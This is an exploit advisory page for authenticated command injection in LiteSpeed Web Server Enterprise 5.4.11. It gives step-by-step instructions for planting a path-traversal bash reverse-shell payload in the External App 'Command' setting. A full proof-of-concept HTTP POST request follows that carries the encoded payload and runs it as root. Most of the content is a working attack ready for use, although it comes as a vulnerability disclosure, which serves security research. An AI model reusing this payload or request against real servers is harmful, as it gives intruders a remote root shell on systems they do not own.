LiteSpeed Web Server Enterprise 5.4.11 Command Injection

2021.02.06
Credit: SunCSR
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated) # Date: 05/20/2021 # Exploit Author: cmOs - SunCSR # Vendor Homepage: https://www.litespeedtech.com/ # Software Link: https://www.litespeedtech.com/products # Version: 5.4.11 # Ubuntu/Kali Linux Step 1: Log in to the dashboard using the Administrator account. Step 2 : Access Server Configuration > Server > External App > Edit Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon) Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value Step 5: Graceful Restart [POC] POST /config/confMgr.php HTTP/1.1 Host: 192.168.1.6:7080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/* ;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.6:7080/config/confMgr.php?m=serv&p=ext&t=A_EXT_FCGI&r=file&a=E&tk=0.59220300%201612516386 Content-Type: application/x-www-form-urlencoded Content-Length: 505 Origin: https://192.168.1.6:7080 Connection: close Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f; lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D Upgrade-Insecure-Requests: 1 name=file&address=127.0.0.1%3A5434&note=&maxConns=2000&env=&initTimeout=1&retryTimeout=1&persistConn=1&pcKeepAliveTimeout=20&respBuffer=0&autoStart=1&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.1.6%2F1234+0%3E%261%27&backlog=&instances=&extUser=root&extGroup=root&umask=&runOnStartUp=3&extMaxIdleTime=&priority=&memSoftLimit=&memHardLimit=&procSoftLimit=&procHardLimit=&a=s&m=serv&p=ext&t=A_EXT_FCGI&r=file&tk=0.59220300+1612516386&file_create=


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top